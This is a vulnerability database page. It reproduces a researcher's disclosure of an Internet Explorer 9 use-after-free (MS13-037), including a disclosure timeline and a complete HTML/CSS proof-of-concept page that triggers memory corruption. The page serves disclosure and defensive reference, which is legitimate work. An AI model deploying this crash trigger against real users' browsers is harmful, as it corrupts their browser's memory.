Vulners
Lucene search
Microsoft Internet Explorer 9 MSHTML - CDispNode::InsertSiblingNode Use-After-Free (MS13-037) (1)
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | CVE-2013-2551 | 11 Mar 201300:00 | – | attackerkb |
| CVE-2013-1308 | 15 May 201300:00 | – | attackerkb |
 | CVE-2013-1309 | 9 Dec 201600:00 | – | circl |
 | Internet Explorer CDispNode Use-after-free (MS13-037; CVE-2013-1309) | 27 Jun 201300:00 | – | checkpoint_advisories |
 | CVE-2013-1309 | 15 May 201301:00 | – | cve |
 | CVE-2013-1309 | 15 May 201301:00 | – | cvelist |
 | MS13-037: Cumulative Security Update for Internet Explorer: May 14, 2013 | 14 May 201300:00 | – | mskb |
 | CVE-2013-1309 | 15 May 201303:36 | – | nvd |
 | Microsoft Internet Explorer Multiple Use After Free Vulnerabilities (2829530) | 15 May 201300:00 | – | openvas |
| Microsoft Internet Explorer Multiple Use After Free Vulnerabilities (2829530) | 15 May 201300:00 | – | openvas |
10
<!--
Source: http://blog.skylined.nl/20161207001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. JavaScript does not appear to be required for an attacker to triggering the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of BugId below.
Repro.html:
-->
<!doctype html>
<html>
<head>
<script>
window.onload=function(){location.reload();};
</script>
</head>
<body>
<var>
<img class="float" ismap="ismap" usemap="map"/>
<map id="map"><area/></map>
<dfn class="float"></dfn>
<a class="float"></a>
<input class="zoom"/>
text
</var>
<q class="border float zoom" xml:space="preserve"> </q>
</body>
<style type="text/css">
.float {
float:left;
}
.zoom {
zoom:3000%;
}
.border::first-letter {
border-top:1px;
}
</style>
</html>
<!--
Time-line
1 November 2012: This vulnerability was found through fuzzing.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
4 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
7 December 2016: Details of this vulnerability are released.
-->
# 0day.today [2018-03-31] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Dec 2016 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.37985